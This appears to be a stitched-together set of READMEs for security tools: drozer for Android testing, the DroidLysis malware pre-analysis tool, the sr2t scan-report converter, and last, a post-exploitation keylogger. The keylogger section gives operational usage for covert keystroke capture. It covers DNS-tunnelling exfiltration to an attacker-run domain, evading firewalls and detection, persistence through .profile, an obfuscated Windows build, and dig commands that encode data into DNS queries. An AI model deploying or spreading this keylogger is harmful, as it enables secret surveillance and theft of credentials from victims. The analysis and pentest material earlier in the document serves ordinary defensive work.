NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi
Run dist/drozer-2.x.x.win-x.msi
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:
selecting f75640f67144d9a3 (unknown sdk 4.1.1)
dz>
The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.
Command | Description |
---|---|
run | Executes a drozer module |
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. |
shell | Start an interactive Linux shell on the device, in the context of the Agent process. |
cd | Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module. |
clean | Remove temporary files stored by drozer on the Android device. |
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system. |
echo | Print text to the console. |
exit | Terminate the drozer session. |
help | Display help about a particular command or module. |
load | Load a file containing drozer commands, and execute them in sequence. |
module | Find and install additional drozer modules from the Internet. |
permissions | Display a list of the permissions granted to the drozer Agent. |
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. |
unset | Remove a named variable that drozer passes to any Linux shells that it spawns. |
drozer is released under a 3-clause BSD License. See LICENSE for full details.
drozer is Open Source software, made great by contributions from the community.
Bug reports, feature requests, comments and questions can be submitted here.
DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install the Android disassembly tools Apktool, Baksmali, and Dex2jar (and optionally Procyon for decompiling to Java):
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv
, or pyenv virtual environments etc).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis
).
Configure conf/general.conf
. In particular, make sure to change /home/axelle
with your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf
(you can switch to another file with the --config
option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf
, ./conf/wide.conf
, ./conf/arm.conf
, ./conf/kit.conf
) and the name of the database file (only used if you specify --enable-sql
)
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:
- An analysis directory for each sample. For example, with --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290
- A database (droidlysis.db) containing properties it noticed.
Get usage with droidlysis --help
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein
. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput
. If you want to store all statistics in a SQL database, use --enable-sql
(see here)
DEX decompilation with Procyon takes quite a long time, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon
.
By default, DroidLysis does not inspect known third-party SDKs, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception
. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement SDKs) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
Sample output directory (--output DIR
)
This directory contains (when applicable):
- AndroidManifest.xml
- res
- lib, assets
- smali (and others)
- META-INF
- ./unzipped
- classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred
The following files are generated by DroidLysis:
autoanalysis.md: lists each pattern DroidLysis detected and where.
report.md: same as what was printed on the console.
If you do not need the sample output directory to be generated, use the --clearoutput option.
Import trackers from Exodus Privacy (--import-exodus):
$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the two files and check which trackers you wish to add.
If you want to process a directory of samples, you'll probably want to store the properties DroidLysis finds in a database, so the findings are easy to parse and query. In that case, use the --enable-sql option. This will automatically dump all results into a database named droidlysis.db, in a table named samples. Each row corresponds to a given sample, and each column is a property DroidLysis tracks.
For example, to retrieve the filename, SHA256 sum and Smali properties of every sample in the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
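For programmatic access, the same query can be run with Python's built-in sqlite3 module. Below is a minimal sketch, assuming the default database name droidlysis.db and the column names shown above; treating smali_properties as JSON mirrors the output above but is an assumption about the storage format.
import json
import sqlite3

# Open the database produced by --enable-sql (default name: droidlysis.db)
con = sqlite3.connect("droidlysis.db")
query = "SELECT sha256, sanitized_basename, smali_properties FROM samples"
for sha256, name, smali in con.execute(query):
    props = json.loads(smali)  # smali_properties appears to be stored as JSON
    if props.get("send_sms"):
        print(f"{name} ({sha256[:12]}...) can send SMS messages")
con.close()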
What DroidLysis detects can be configured and extended in the files of the ./conf
directory.
A pattern consists of:
A tag name, e.g. send_sms. This names the property and must be unique across the .conf file.
A regexp, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, it covers the three different ways to send SMS messages from code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
A description, e.g. Sending SMS messages.
For example:
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
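To illustrate how such a pattern is applied, the short sketch below runs the send_sms regexp over a couple of Smali lines; the Smali strings are made up purely for demonstration.
import re

# Pattern taken from the [send_sms] entry above
send_sms = re.compile(r";->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage")

# Hypothetical Smali lines, for illustration only
smali_lines = [
    "invoke-virtual {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V",
    "invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;",
]
for line in smali_lines:
    if send_sms.search(line):
        print("send_sms property matched:", line)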
Exodus Privacy maintains a list of various SDKs which are interesting to rule out of our analysis via conf/kit.conf. Add the --import-exodus option to the droidlysis command line: this will parse the trackers Exodus Privacy knows about which aren't yet in your kit.conf, and append all new trackers to ~/.cache/droidlysis/kit.conf.
Afterwards, you may want to sort your kit.conf
file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
This tool takes a scanning tool's output file and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool offers a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all discovered open ports and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t in two ways:
When installed as a package, call the installed script: sr2t --help
When running from the cloned repository, call the package directly from its root: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to output a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389  | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X
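The CSV output is easy to post-process with standard tooling. As a small illustration (not part of sr2t itself), the sketch below uses Python's csv module and the column names shown above to keep only findings with severity 2 or higher:
import csv

# Filter the sr2t Nessus CSV export for severity >= 2 findings
with open("example_nessus.csv", newline="") as f:
    for row in csv.DictReader(f):
        if int(row["severity"]) >= 2:
            print(row["host"], row["port"], row["plugin name"], sep=",")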
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164  | 445  | tcp   | microsoft-ds  | open  |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
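The per-port matrix CSV can likewise be pivoted with a few lines of Python (illustrative only, using the header shown above) to list, for example, every host with TCP/3389 marked open:
import csv

# List hosts that have TCP/3389 marked with an "X" in the sr2t Nmap matrix CSV
with open("example_nmap_tcp.csv", newline="") as f:
    for row in csv.DictReader(f):
        if row.get("3389") == "X":
            print(row["ip address"])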
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce a text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10  | 80          | The X-Content-Type-Options header is not set. This could allow the user agent to | X           |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order    | 0    | 0           | false        | false       | false               |              | X           |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport            | 3.0      | 5.0        | X           |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.
The tool is designed for lightweight exfiltration and persistence, properties that help it avoid detection. It uses DNS tunnelling/exfiltration to bypass firewalls and evade detection.
The server uses Python 3.
To install dependencies, run python3 -m pip install -r requirements.txt
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments:
ip
domain
options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p
flag to specify a different port.
ip
is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain
is the domain to listen for, which should be the domain that the server is authoritative for.
On your registrar, change your domain's nameservers to custom DNS. Point them to two domains, ns1.example.com and ns2.example.com. Then add records that point these nameserver domains to your exfiltration server's IP address. This is the same as setting glue records.
The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe it to the connection.sh script; it will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed
To start the keylogger, run ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end causes the shell to close when the logger exits; without it, exiting would bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.
The -p option specifies the location of the temporary log file that all inputs are sent to. By default, this is /tmp/.
The -l option shows warnings and errors, which can be useful for debugging.
logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile so it starts on every new interactive shell.
connection.sh
Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet
To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug
target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
You can use dig
to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short
send a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short
send a test message to localhost.
Replace example.com
with the domain the server is listening for.
A record requests starting with a
indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
